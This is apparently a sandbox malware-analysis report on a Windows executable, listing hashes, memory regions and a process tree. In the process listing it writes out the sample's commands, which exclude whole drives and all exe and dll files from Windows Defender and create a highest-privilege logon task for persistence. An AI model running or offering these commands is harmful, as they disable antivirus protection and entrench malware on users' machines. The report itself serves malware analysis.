Analysis
-
max time kernel
126s -
max time network
135s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
14-10-2021 05:08
Static task
static1
Behavioral task
behavioral1
Sample
fa409741e16094bb8bc373d7b46742cd.exe
Resource
win7-en-20210920
General
-
Target
fa409741e16094bb8bc373d7b46742cd.exe
-
Size
1.9MB
-
MD5
fa409741e16094bb8bc373d7b46742cd
-
SHA1
e082dd13c52fe7fb65fac801d2588e0c9153d9cc
-
SHA256
c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8
-
SHA512
7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
shrome.exesihost32.exepid process 1772 shrome.exe 1276 sihost32.exe -
Loads dropped DLL 4 IoCs
Processes:
cmd.execonhost.exepid process 1748 cmd.exe 1748 cmd.exe 548 conhost.exe 548 conhost.exe -
Drops file in System32 directory 6 IoCs
Processes:
powershell.exepowershell.execonhost.execonhost.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\shrome.exe conhost.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepid process 1408 conhost.exe 1228 powershell.exe 1508 powershell.exe 548 conhost.exe 548 conhost.exe 112 powershell.exe 1132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1408 conhost.exe Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 548 conhost.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
fa409741e16094bb8bc373d7b46742cd.execonhost.execmd.execmd.execmd.exeshrome.execonhost.execmd.exedescription pid process target process PID 1316 wrote to memory of 1408 1316 fa409741e16094bb8bc373d7b46742cd.exe conhost.exe PID 1316 wrote to memory of 1408 1316 fa409741e16094bb8bc373d7b46742cd.exe conhost.exe PID 1316 wrote to memory of 1408 1316 fa409741e16094bb8bc373d7b46742cd.exe conhost.exe PID 1316 wrote to memory of 1408 1316 fa409741e16094bb8bc373d7b46742cd.exe conhost.exe PID 1408 wrote to memory of 1452 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 1452 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 1452 1408 conhost.exe cmd.exe PID 1452 wrote to memory of 1228 1452 cmd.exe powershell.exe PID 1452 wrote to memory of 1228 1452 cmd.exe powershell.exe PID 1452 wrote to memory of 1228 1452 cmd.exe powershell.exe PID 1408 wrote to memory of 1144 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 1144 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 1144 1408 conhost.exe cmd.exe PID 1144 wrote to memory of 1816 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 1816 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 1816 1144 cmd.exe schtasks.exe PID 1452 wrote to memory of 1508 1452 cmd.exe powershell.exe PID 1452 wrote to memory of 1508 1452 cmd.exe powershell.exe PID 1452 wrote to memory of 1508 1452 cmd.exe powershell.exe PID 1408 wrote to memory of 1748 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 1748 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 1748 1408 conhost.exe cmd.exe PID 1748 wrote to memory of 1772 1748 cmd.exe shrome.exe PID 1748 wrote to memory of 1772 1748 cmd.exe shrome.exe PID 1748 wrote to memory of 1772 1748 cmd.exe shrome.exe PID 1772 wrote to memory of 548 1772 shrome.exe conhost.exe PID 1772 wrote to memory of 548 1772 shrome.exe conhost.exe PID 1772 wrote to memory of 548 1772 shrome.exe conhost.exe PID 1772 wrote to memory of 548 1772 shrome.exe conhost.exe PID 548 wrote to memory of 1752 548 conhost.exe cmd.exe PID 548 wrote to memory of 1752 548 conhost.exe cmd.exe PID 548 wrote to memory of 1752 548 conhost.exe cmd.exe PID 1752 wrote to memory of 112 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 112 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 112 1752 cmd.exe powershell.exe PID 548 wrote to memory of 1276 548 conhost.exe sihost32.exe PID 548 wrote to memory of 1276 548 conhost.exe sihost32.exe PID 548 wrote to memory of 1276 548 conhost.exe sihost32.exe PID 1752 wrote to memory of 1132 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 1132 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 1132 1752 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\shrome.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\shrome.exeC:\Windows\system32\shrome.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Windows\system32\shrome.exe"5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"7⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
9839a153dd23f855e14ced0d44035208
SHA1276add3c053dd890b6386e64e13df8bb2cb9a853
SHA256ff48a647e20916e7d2026caefcb6280a83209af6cfb9da271d24ec17d5f12e94
SHA512416ac27c93af1abc146c2f848477fa38f079cf6252d232aa1d9f7fb42ddbf6bc65016b4dcdf13f939def7c686ac303e1d8e7434916d3e0de7c12140b1fccf941
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
a07cf59ef745ea27ea563d21fd2881d7
SHA1f46837adee2b5c702bb0196e7cabb87ca203b5d2
SHA2562134fdde87cefc1c5f4f6b2e2ba906584ba6bf247ddb0884a845b11c7a996fd1
SHA512122c64c7790f1f23331af4a790c01720b516b534565e0e7a4cc0f6b4f52ec903d1a2b16d6ad353455308c6296988ce257f29386b75745a9ecbd8f9b0e6b7f247
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
a07cf59ef745ea27ea563d21fd2881d7
SHA1f46837adee2b5c702bb0196e7cabb87ca203b5d2
SHA2562134fdde87cefc1c5f4f6b2e2ba906584ba6bf247ddb0884a845b11c7a996fd1
SHA512122c64c7790f1f23331af4a790c01720b516b534565e0e7a4cc0f6b4f52ec903d1a2b16d6ad353455308c6296988ce257f29386b75745a9ecbd8f9b0e6b7f247
-
C:\Windows\System32\Microsoft\Telemetry\sihost32.exeMD5
cceaed462cd04bcc64c90e5d0f11df59
SHA17a1b253f70f7b30decac1098245431459d8e96b5
SHA256a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682
SHA5123df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9
-
C:\Windows\System32\shrome.exeMD5
fa409741e16094bb8bc373d7b46742cd
SHA1e082dd13c52fe7fb65fac801d2588e0c9153d9cc
SHA256c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8
SHA5127cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f
-
C:\Windows\system32\shrome.exeMD5
fa409741e16094bb8bc373d7b46742cd
SHA1e082dd13c52fe7fb65fac801d2588e0c9153d9cc
SHA256c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8
SHA5127cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Windows\System32\Microsoft\Telemetry\sihost32.exeMD5
cceaed462cd04bcc64c90e5d0f11df59
SHA17a1b253f70f7b30decac1098245431459d8e96b5
SHA256a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682
SHA5123df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9
-
\Windows\System32\Microsoft\Telemetry\sihost32.exeMD5
cceaed462cd04bcc64c90e5d0f11df59
SHA17a1b253f70f7b30decac1098245431459d8e96b5
SHA256a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682
SHA5123df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9
-
\Windows\System32\shrome.exeMD5
fa409741e16094bb8bc373d7b46742cd
SHA1e082dd13c52fe7fb65fac801d2588e0c9153d9cc
SHA256c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8
SHA5127cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f
-
\Windows\System32\shrome.exeMD5
fa409741e16094bb8bc373d7b46742cd
SHA1e082dd13c52fe7fb65fac801d2588e0c9153d9cc
SHA256c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8
SHA5127cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f
-
memory/112-102-0x0000000002342000-0x0000000002344000-memory.dmpFilesize
8KB
-
memory/112-96-0x000007FEEC750000-0x000007FEED2AD000-memory.dmpFilesize
11.4MB
-
memory/112-88-0x0000000000000000-mapping.dmp
-
memory/112-101-0x0000000002340000-0x0000000002342000-memory.dmpFilesize
8KB
-
memory/112-108-0x000000000234B000-0x000000000236A000-memory.dmpFilesize
124KB
-
memory/112-103-0x0000000002344000-0x0000000002347000-memory.dmpFilesize
12KB
-
memory/548-97-0x000000001B192000-0x000000001B194000-memory.dmpFilesize
8KB
-
memory/548-100-0x000000001B197000-0x000000001B198000-memory.dmpFilesize
4KB
-
memory/548-99-0x000000001B196000-0x000000001B197000-memory.dmpFilesize
4KB
-
memory/548-98-0x000000001B194000-0x000000001B196000-memory.dmpFilesize
8KB
-
memory/836-116-0x000000001AD72000-0x000000001AD74000-memory.dmpFilesize
8KB
-
memory/836-114-0x0000000000310000-0x0000000000313000-memory.dmpFilesize
12KB
-
memory/836-117-0x000000001AD74000-0x000000001AD76000-memory.dmpFilesize
8KB
-
memory/836-118-0x000000001AD76000-0x000000001AD77000-memory.dmpFilesize
4KB
-
memory/836-119-0x000000001AD77000-0x000000001AD78000-memory.dmpFilesize
4KB
-
memory/1132-111-0x00000000029D2000-0x00000000029D4000-memory.dmpFilesize
8KB
-
memory/1132-109-0x000000001B7A0000-0x000000001BA9F000-memory.dmpFilesize
3.0MB
-
memory/1132-113-0x00000000029DB000-0x00000000029FA000-memory.dmpFilesize
124KB
-
memory/1132-110-0x00000000029D0000-0x00000000029D2000-memory.dmpFilesize
8KB
-
memory/1132-112-0x00000000029D4000-0x00000000029D7000-memory.dmpFilesize
12KB
-
memory/1132-104-0x0000000000000000-mapping.dmp
-
memory/1132-107-0x000007FEF1E40000-0x000007FEF299D000-memory.dmpFilesize
11.4MB
-
memory/1144-63-0x0000000000000000-mapping.dmp
-
memory/1228-67-0x0000000002740000-0x0000000002742000-memory.dmpFilesize
8KB
-
memory/1228-61-0x0000000000000000-mapping.dmp
-
memory/1228-62-0x000007FEFB891000-0x000007FEFB893000-memory.dmpFilesize
8KB
-
memory/1228-68-0x0000000002742000-0x0000000002744000-memory.dmpFilesize
8KB
-
memory/1228-70-0x000000000274B000-0x000000000276A000-memory.dmpFilesize
124KB
-
memory/1228-64-0x000007FEEEE40000-0x000007FEEF7DD000-memory.dmpFilesize
9.6MB
-
memory/1228-69-0x0000000002744000-0x0000000002747000-memory.dmpFilesize
12KB
-
memory/1276-92-0x0000000000000000-mapping.dmp
-
memory/1408-59-0x000000001B1E6000-0x000000001B1E7000-memory.dmpFilesize
4KB
-
memory/1408-54-0x00000000000B0000-0x00000000002A1000-memory.dmpFilesize
1.9MB
-
memory/1408-56-0x000000001B450000-0x000000001B63D000-memory.dmpFilesize
1.9MB
-
memory/1408-58-0x000000001B1E4000-0x000000001B1E6000-memory.dmpFilesize
8KB
-
memory/1408-55-0x000000001B1E2000-0x000000001B1E4000-memory.dmpFilesize
8KB
-
memory/1408-66-0x000000001B1E7000-0x000000001B1E8000-memory.dmpFilesize
4KB
-
memory/1452-60-0x0000000000000000-mapping.dmp
-
memory/1508-75-0x0000000002640000-0x0000000002642000-memory.dmpFilesize
8KB
-
memory/1508-78-0x000000000264B000-0x000000000266A000-memory.dmpFilesize
124KB
-
memory/1508-77-0x0000000002644000-0x0000000002647000-memory.dmpFilesize
12KB
-
memory/1508-76-0x0000000002642000-0x0000000002644000-memory.dmpFilesize
8KB
-
memory/1508-74-0x000007FEED0F0000-0x000007FEEDC4D000-memory.dmpFilesize
11.4MB
-
memory/1508-71-0x0000000000000000-mapping.dmp
-
memory/1748-79-0x0000000000000000-mapping.dmp
-
memory/1752-87-0x0000000000000000-mapping.dmp
-
memory/1772-83-0x0000000000000000-mapping.dmp
-
memory/1816-65-0x0000000000000000-mapping.dmp